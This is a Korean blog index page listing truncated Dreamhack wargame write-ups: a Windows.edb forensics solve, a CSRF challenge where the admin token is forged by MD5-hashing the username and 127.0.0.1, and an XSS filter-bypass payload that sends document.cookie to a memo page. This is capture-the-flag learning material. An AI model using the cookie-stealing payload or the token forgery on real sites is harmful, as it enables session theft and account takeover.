보호되어 있는 글입니다.
보호되어 있는 글입니다.
https://moaistory.blogspot.com/2018/10/winsearchdbanalyzer.html WinSearchDBAnalyzerWinSearchDBAnalyzer This tool can parse normal records and recover deleted records in Windows.edb. Windows.edb is used in Win...moaistory.blogspot.com이 문제를 풀기위해 WindSearchDBAnalyzer라는 툴을 사용해준다.설치후 파일을 실행해준다.File -> Open드림핵에서 다운받은 windows.edb 파일을 열어준다.시간은 한국시간인 UTC+9 선택OK클릭find에 dh를 넣고 검색하니 flag가 나왔다.
#!/usr/bin/python3from flask import Flask, request, render_template, gimport sqlite3import osimport binasciiapp = Flask(__name__)app.secret_key = os.urandom(32)try: FLAG = open('./flag.txt', 'r').read()except: FLAG = '[**FLAG**]'DATABASE = "database.db"if os.path.exists(DATABASE) == False: db = sqlite3.connect(DATABASE) db.execute('create table users(userid char(100), userpassword ch..
guest로 로그인후 비밀번호 변경을 하면 http://host3.dreamhack.games:19454/change_password?pw=1234&csrftoken=3c52b332e2f3cad2f79648520d240e9durl이 이렇게 바뀐다. admin의 csrf_token 을 알아내서 비밀번호를 바꾼후 로그인하면 되는 문제이다. token_storage[session_id] = md5((username + request.remote_addr).encode()).hexdigest()csrf_token은 위와같이 admin+서버의 로컬 ip주소로 암호화되서 저장된다. from hashlib import md5username = b"admin"ip_addr = b"127.0.0.1"csrf_token..
https://dreamhack.io/wargame/challenges/433 XSS Filtering BypassDescription Exercise: XSS Filtering Bypass에서 실습하는 문제입니다. 문제 수정 내역 2023.08.04 Dockerfile 제공dreamhack.io 공격구문locatioonn.href = "/memo?memo=" + document.cookie;flag에 입력한후메모를 보면 flag가 있다.
- Total
- Today
- Yesterday
- 메트릭
- 점프킹설치
- ospf config
- Brave
- 점프킹
- vmware player
- 오버플로우
- 패킷트레이서
- ospf
- 설정법
- 무료설치
- 네트워크
- 라우팅
- 디폴트라우팅
- dr/bdr
- 라우터
- vmware pro
- 과제
- 버퍼오버플로우
- 정적라우팅
- jump king
- 동적라우팅
- 코드업
- 힙오버플로우
- github
- vmware key
- 포트포워딩
- 스택 버퍼 오버플로우
- 설치법
- 게이트웨이
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |